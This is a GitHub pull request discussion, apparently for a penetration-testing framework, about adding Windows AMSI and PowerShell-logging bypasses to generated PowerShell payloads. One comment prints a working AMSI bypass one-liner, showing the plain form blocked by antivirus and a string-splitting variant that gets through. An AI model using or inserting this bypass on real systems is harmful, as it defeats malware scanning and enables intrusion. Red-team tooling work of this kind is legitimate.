Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Integrate PowerShell Protections Bypass #17

Merged
merged 5 commits into from Apr 22, 2019

Conversation

@phra
Copy link
Contributor

commented Jan 19, 2019

@phra phra changed the title Integrate psh protections bypass Integrate PowerShell Protections Bypass Jan 19, 2019

@bwatters-r7

This comment has been minimized.

Copy link
Contributor

commented Feb 14, 2019

@phra I missed this for a bit, but I'd like to test and land this. Can you give specific examples where our current payloads fail, but this succeeds so we can have some testing benchmarks?

@phra

This comment has been minimized.

Copy link
Contributor Author

commented Feb 14, 2019

@bwatters-r7 just try any powershell payloads on an updated win 10 machine with AMSI.

phra and others added some commits Feb 17, 2019

RageLtMan
Remove intrinsic use of bypasses in psh blocks
Rex::Powershell has functionality to compose PowerShell code into
Script objects using basic lexical parsing to identify functions,
variables, etc. This functionality is intended to permit/leverage
composition by consumers for maximum entropy. Concurrently, script
modifiers are in place to clean up multiline blocks, replace names,
and perform other obfuscation.

Strip out the built-in uses of the new AMSI and log bypass methods.
Remove textual cleanup to allow Rex to handle this as needed.
RageLtMan
Implement dynamic bypass addition in payload gen
Passing the :prepend_protections_bypass to cmd_psh_payload will
prepend the Ruby blocks for AMSI and log bypass to the payload
text. The subsequent compression and encoding passes will perform
the same textual substitution stripping out whitespace and may
also substitute the hardcoded variable names if requested.

This approach keeps string lengths predictable while permitting
use of the evasion functionality. Not so much an issue for a full
PSH payload, but can be handy when dealing with limited space
(HID attacks, manual retyping over GUIs, etc).
@phra

This comment has been minimized.

Copy link
Contributor Author

commented Apr 15, 2019

@timwr

This comment has been minimized.

Copy link
Contributor

commented Apr 16, 2019

Very interesting thanks @phra

@timwr

This comment has been minimized.

Copy link
Contributor

commented Apr 22, 2019

I didn't expect the '+' to work so well:

Microsoft Windows [Version 10.0.17134.523]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Users\User>powershell.exe
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Users\User>
>> $Ref=[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils');$Ref.GetField('amsiInitFailed','NonPublic,Stati
c').SetValue($null,$true);
>>
>>
>>
At line:1 char:1
+
This script contains malicious content and has been blocked by your antivirus software.
    + CategoryInfo          : ParserError: (:) [], ParentContainsErrorRecordException
    + FullyQualifiedErrorId : ScriptContainedMaliciousContent

PS C:\Users\User> $Ref=[Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils');$Ref.GetField('amsiIn'+'itFai
led','NonPublic,Static').SetValue($null,$true);
>>
>>
>>
PS C:\Users\User>
PS C:\Users\User>

@timwr timwr merged commit 2e14657 into rapid7:master Apr 22, 2019

1 check passed

continuous-integration/travis-ci/pr The Travis CI build passed
Details

timwr added a commit that referenced this pull request Apr 22, 2019

@timwr

This comment has been minimized.

Copy link
Contributor

commented Apr 22, 2019

Thanks @phra
We still need to add this to webdelivery (preferably as an off-by-default option).
It would be nice to have the strings obfuscated dynamically, but this will do for now.

@phra

This comment has been minimized.

Copy link
Contributor Author

commented Apr 23, 2019

I didn't expect the '+' to work so well:

image

It would be nice to have the strings obfuscated dynamically, but this will do for now.

empire includes https://github.com/danielbohannon/Invoke-Obfuscation but depends on PowerShell and that means adding it as optional? dependency or embedding it directly within the project with a ~50mb overhead of stuff.

writing a simpler, similar project in ruby may be an overkill.

any idea?

@0xVIC

This comment has been minimized.

@phra phra deleted the phra:feat/psh-protections-bypass branch Apr 23, 2019

@phra

This comment has been minimized.

Copy link
Contributor Author

commented May 1, 2019

was prepend_protections_bypass option defined somewhere?

i don't see the setting available yet with Framework Version: 5.0.19-dev.

@timwr

This comment has been minimized.

Copy link
Contributor

commented May 10, 2019

@phra apologies I didn't send a PR with that part, I think I tested with this commit: timwr/metasploit-framework@a0d6bcd

@phra

This comment has been minimized.

Copy link
Contributor Author

commented May 10, 2019

oh ok, i hope it will be merged into master soon!
regarding the web delivery, it should be enough to prepend the bypass before the delivery script itself when choosing PowerShell as target.

@phra

This comment has been minimized.

Copy link
Contributor Author

commented Jul 21, 2019

any update? i still cannot easily add the amsi bypass to powershell payloads.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
4 participants
You can’t perform that action at this time.